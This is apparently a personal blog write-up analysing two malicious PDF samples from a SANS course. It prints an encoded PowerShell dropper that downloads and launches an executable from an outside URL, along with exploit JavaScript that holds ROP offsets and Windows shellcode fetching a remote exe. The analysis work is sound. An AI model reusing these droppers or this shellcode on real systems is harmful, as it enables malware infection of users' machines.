|| Date: 18-06-17 || Back to index ||
|| Tag: write-up ||

PDF Malware Analysis

A PDF is a collection of elements

X Y obj
endobj
// X is the object number
// Y is the version or generation number

Below is an example of an Indirect Object

1 0 obj
Type: /Page
<<
    /AA /O 43 0 R
>>
endobj

/AA means Automatic Action and /O means upon opening the document. This directs the PDF file to take and automatic action, referenced in object #43, version 0, upon opening the document. The R at the end is needed to reference the indirect object #43/0

/OpenAction is similar to /AA /O: it executes an action open a file open

A lot of PDFs can contain a JS stream that loads up a shellcode and exploits a PDF vulnerability to spray the heap with it. If you encounter shellcode in a JS script, its most probably in an encoded format as Unicode. Use base64dump.py -e pu to extract it in a sexy, raw binary format.

Example 1

This example was taken from SANS FOR610 course.

Running pdf-parser yield the following:

$ pdfid ctk.pdf
PDFiD 0.2.1 ctk.pdf
 PDF Header: %PDF-1.1
 obj                    5
 endobj                 5
 stream                 1
 endstream              0
 xref                   1
 trailer                1
 startxref              1
 /Page                  1
 /Encrypt               0
 /ObjStm                0
 /JS                    0
 /JavaScript            0
 /AA                    0
 /OpenAction            1
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                1
 /EmbeddedFile          0
 /XFA                   0
 /Colors > 2^24         0

The result above shows that we have one /OpenAction element. This means one element is able to execute upon opening the PDF document. This already should raise a red flag.

Below is the output of pdf-parser

PDF Comment '%PDF-1.1\r\n'

obj 1 0
 Type: /Catalog
 Referencing: 2 0 R

  <<
    /OpenAction
      <<
        /S /Launch
        /Win
          <<
            /F '(C:\\\\WINDOWS\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe)'
            /P (powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBuAGMAZAB1AGcAYQBuAGQAYQAuAG8AcgBnAC8ALgBjAHMAcwAvAGEAdwBvAHIAaQAuAGUAeABlACcALAAdICQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAYQB3AG8AcgBpAC4AZQB4AGUAHSApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAGEAdwBvAHIAaQAuAGUAeABlAB0gKQA= -windowstyle hidden)
          >>
      >>
    /Pages 2 0 R
    /Type /Catalog
  >>

...
...
...

trailer
  <<
    /Size 6
    /Root 1 0 R
    /ID [(bc38735adadf7620b13216ff40de2b26)(bc38735adadf7620b13216ff40de2b26)]
  >>

Let’s break it down: The first element is the Header we mentioned before. The last element is the Trailer. This is actually quite important since it contains a breakdown of how many elements are there in total and the root element that is executed foremost when the document is executed. Above, the /Root dictionary entry references 1 0 R, the first object in the document.

obj 1 0 contains a /OpenAction dictionary entry that looks like it will run in a \win environment and launch a powershell.exe with the parameters indicated with /p. The parameters are encoded with Base64. Decoding it would yield the following:

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://ncduganda.org/.css/awori.exe',
$env:APPDATA\awori.exe
);Start-Process (
$env:APPDATA\awori.exe

Looks like our PDF will download awori.exe and launch it. Fun!!

Example 2

This malware sample was provided by SANS FOR610.

The following sample is named page.pdf

$ pdfid page.pdf
PDFiD 0.2.1 page.pdf
 PDF Header: %PDF-1.5
 obj                    6
 endobj                 6
 stream                 2
 endstream              2
 xref                   1
 trailer                1
 startxref              1
 /Page                  1
 /Encrypt               0
 /ObjStm                0
 /JS                    0
 /JavaScript            0
 /AA                    0
 /OpenAction            0
 /AcroForm              1
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                0
 /EmbeddedFile          0
 /XFA                   1
 /Colors > 2^24         0

We see that we have one AcroForm object. <TODO: What is Acroform?>

Examining the document’s Trailer with pdf_parser reveals:

trailer
  <<
    /Root 3 0 R
    /Size 7
  >>

Examining obj 3 0 reveals:

obj 3 0
 Type: /Catalog
 Referencing: 4 0 R, 2 0 R

  <<
    /Extensions
      <<
        /ADBE
          <<
            /ExtensionLevel 3
            /BaseVersion /1.7
          >>
      >>
    /Pages 4 0 R
    /AcroForm 2 0 R
    /Type /Catalog
    /NeedsRendering true
  >>

obj 3 0 references /AcroForm 2 0 R. Examining this AcroForm reveals:

obj 1 0
 Type: 
 Referencing: 
 Contains stream

  <<
    /Filter /FlateDecode
    /Length 403673
  >>


obj 2 0
 Type: 
 Referencing: 1 0 R

  <<
    /XFA 1 0 R
  >>

obj 2 0 references obj 1 0 and obj 1 0 contains a very large encoded stream. Luckily, pdf-parser has the ability to decode /FlateDecode streams

$ pdf-parser page.pdf --raw --filter -o 1 | vim -
Vim: Reading from stdin...

<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" timeStamp="2012-11-23T13:41:54Z" uuid="0aa46f9b-2c50-42d4-ab0b-1a1015321da7">
<template xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/" xmlns="http://www.xfa.org/schema/xfa-template/3.0/">
   <?formServer defaultPDFRenderFormat acrobat9.1static?>
   <?formServer allowRenderCaching 0?>
   <?formServer formModel both?>
   <subform name="form1" layout="tb" locale="en_US" restoreState="auto">
      <pageSet>
         <pageArea name="Page1" id="Page1">
            <contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/>
            <medium stock="default" short="612pt" long="792pt"/>
            <?templateDesigner expand 1?>
         </pageArea>
         <?templateDesigner expand 1?>
      </pageSet>
      <variables>
         <script name="util" contentType="application/x-javascript">
            function pack(i){
                var low = (i &amp; 0xffff);
                var high = ((i&gt;&gt;16) &amp; 0xffff);
                return String.fromCharCode(low)+String.fromCharCode(high);
            }
            function unpackAt(s, pos){
                return  s.charCodeAt(pos) + (s.charCodeAt(pos+1)&lt;&lt;16);
            }
            function packs(s){
                result = "";
                    for (i=0;i&lt;s.length;i+=2)
                    result += String.fromCharCode(s.charCodeAt(i) + (s.charCodeAt(i+1)&lt;&lt;8));
                    return result;
                }
            function packh(s){
                return String.fromCharCode(parseInt(s.slice(2,4)+s.slice(0,2),16));
                }
            function packhs(s){
                result = "";
                for (i=0;i&lt;s.length;i+=4)
                result += packh(s.slice(i,i+4));
                return result;
            }

            var _offsets =  {"Reader": {

                                         "9.303": {
                                                    "acrord32":    0x85,
                                                    "rop0":        0x14BA8,
                                                    "rop1":        0x1E73AF,
                                                    "rop1x":       0x2F12,
                                                    "rop2":        0x196774,
                                                    "rop3":        0xE475,
                                                    "rop3x":       0xE476,

We have a script!! The names sounds lovely: unpackAt(), packs, packh(). Looking a bit deeper, we can see a NOP slide with a variable called shellcode:

var shellcode = "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u77eb\uc931\u8b64\u3071\u768b\u8b0c\u1c76\u5e8b\u8b08\u207e\u368b\u3966\u184f\uf275\u60c3\u6c8b\u2424\u458b\u8b3c\u0554\u0178\u8bea\u184a\u5a8b\u0120\ue3eb\u4934\u348b\u018b\u31ee\u31ff\ufcc0\u84ac\u74c0\uc107\u0dcf\uc701\uf4eb\u7c3b\u2824\ue175\u5a8b\u0124\u66eb\u0c8b\u8b4b\u1c5a\ueb01\u048b\u018b\u89e8\u2444\u611c\ue8c3\uff92\uffff\u815f\u98ef\uffff\uebff\ue805\uffed\uffff\u8e68\u0e4e\u53ec\u94e8\uffff\u31ff\u66c9\u6fb9\u516e\u7568\u6c72\u546d\ud0ff\u3668\u2f1a\u5070\u7ae8\uffff\u31ff\u51c9\u8d51\u8137\ueec6\uffff\u8dff\u0c56\u5752\uff51\u68d0\ufe98\u0e8a\ue853\uff5b\uffff\u5141\uff56\u68d0\ud87e\u73e2\ue853\uff4b\uffff\ud0ff\u6d63\u2e64\u7865\u2065\u632f\u2020\u2e61\u7865\u0065\u7468\u7074\u2f3a\u772f\u7777\u652e\u7078\u6f6c\u7469\u616d\u657a\u632e\u6d6f\u302f\u6131\u696b\u2e6e\u7865\u0065\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090";
var shellcode2 = shellcode[0] + util.pack((verB &lt;&lt; 16) | verA) + shellcode.substring(3);
var add_num = verA >= 11 ? 16 : 14;

So, we found some shellcode in a bunch of thank-god-its-not-obfuscated Javascript inside a PDF. Let’s hexdump the shellcode and see what we can find.

$ pdf-parser page.pdf --object 1 --filter --raw -d decoded_js.txt
$ base64dump.py -e bu decoded_js.txt
ID  Size    Encoded          Decoded          MD5 decoded
--  ----    -------          -------          -----------
 1:     900 \u4f4f\u4f4f\u4f OOOOOOOOOOOOOOOO ff23042711ff00cb5aedbf5ccef4df7a
 2:      24 \u5858\u5858\u56 XXXXxV4.         f3b3858bc27cf47d3c4ed57be1bd127b
 3:    6000 \u9090\u9090\u90  c6f73cbc08fa0754df7d1cee089e87ff
 4:       6 \u5858           XX               c51b57a703ba1c5869228690c93e1701
 5:       6 \u0000           ..               c4103f122d27677c9db144cae1394a66
 6:       6 \u0000           ..               c4103f122d27677c9db144cae1394a66
$ base64dump.py -e bu decoded_js.txt -s 3 -d > sc.bin
$ hexdump -C sc.bin 
00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000020  eb 77 31 c9 64 8b 71 30  8b 76 0c 8b 76 1c 8b 5e  |.w1.d.q0.v..v..^|
00000030  08 8b 7e 20 8b 36 66 39  4f 18 75 f2 c3 60 8b 6c  |..~ .6f9O.u..`.l|
00000040  24 24 8b 45 3c 8b 54 05  78 01 ea 8b 4a 18 8b 5a  |$$.E<.T.x...J..Z|
00000050  20 01 eb e3 34 49 8b 34  8b 01 ee 31 ff 31 c0 fc  | ...4I.4...1.1..|
00000060  ac 84 c0 74 07 c1 cf 0d  01 c7 eb f4 3b 7c 24 28  |...t........;|$(|
00000070  75 e1 8b 5a 24 01 eb 66  8b 0c 4b 8b 5a 1c 01 eb  |u..Z$..f..K.Z...|
00000080  8b 04 8b 01 e8 89 44 24  1c 61 c3 e8 92 ff ff ff  |......D$.a......|
00000090  5f 81 ef 98 ff ff ff eb  05 e8 ed ff ff ff 68 8e  |_.............h.|
000000a0  4e 0e ec 53 e8 94 ff ff  ff 31 c9 66 b9 6f 6e 51  |N..S.....1.f.onQ|
000000b0  68 75 72 6c 6d 54 ff d0  68 36 1a 2f 70 50 e8 7a  |hurlmT..h6./pP.z|
000000c0  ff ff ff 31 c9 51 51 8d  37 81 c6 ee ff ff ff 8d  |...1.QQ.7.......|
000000d0  56 0c 52 57 51 ff d0 68  98 fe 8a 0e 53 e8 5b ff  |V.RWQ..h....S.[.|
000000e0  ff ff 41 51 56 ff d0 68  7e d8 e2 73 53 e8 4b ff  |..AQV..h~..sS.K.|
000000f0  ff ff ff d0 63 6d 64 2e  65 78 65 20 2f 63 20 20  |....cmd.exe /c  |
00000100  61 2e 65 78 65 00 68 74  74 70 3a 2f 2f 77 77 77  |a.exe.http://www|
00000110  2e 65 78 70 6c 6f 69 74  6d 61 7a 65 2e 63 6f 6d  |.exploitmaze.com|
00000120  2f 30 31 61 6b 69 6e 2e  65 78 65 00 90 90 90 90  |/01akin.exe.....|
00000130  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000007d0
$ 

A cursory glance with hexdump -C shows cmd.exe \c a.exe and an HTTP URL. Now, we can examine it further with scdbg or wrap it as an exe and debug it to know more on the shellcode, but I believe our work here is done.

Conclusion

There’s a process to examining malicious documents. Lenny Zeltser from SANS FOR610 mentions the following:

Till next time